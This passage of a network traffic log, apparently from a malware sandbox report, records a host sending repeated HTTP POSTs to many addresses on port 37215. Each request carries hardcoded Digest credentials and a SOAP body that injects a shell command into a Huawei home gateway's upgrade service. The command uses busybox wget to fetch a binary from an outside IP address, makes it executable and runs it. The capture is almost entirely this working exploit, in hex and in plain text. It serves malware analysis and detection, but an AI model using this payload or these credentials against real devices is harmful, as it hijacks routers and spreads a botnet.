                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2103192.168.2.155872641.208.242.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669611931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2104192.168.2.153881641.178.133.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669651985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2105192.168.2.155089441.56.117.6337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669652939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2106192.168.2.154396841.197.130.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669653893 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2107192.168.2.154937041.224.7.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669667959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2108192.168.2.154855641.237.193.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669667959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2109192.168.2.154073441.132.217.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669701099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2110192.168.2.155800041.124.27.6337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669712067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2111192.168.2.153802441.108.72.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669712067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2112192.168.2.155896041.179.57.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669715881 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
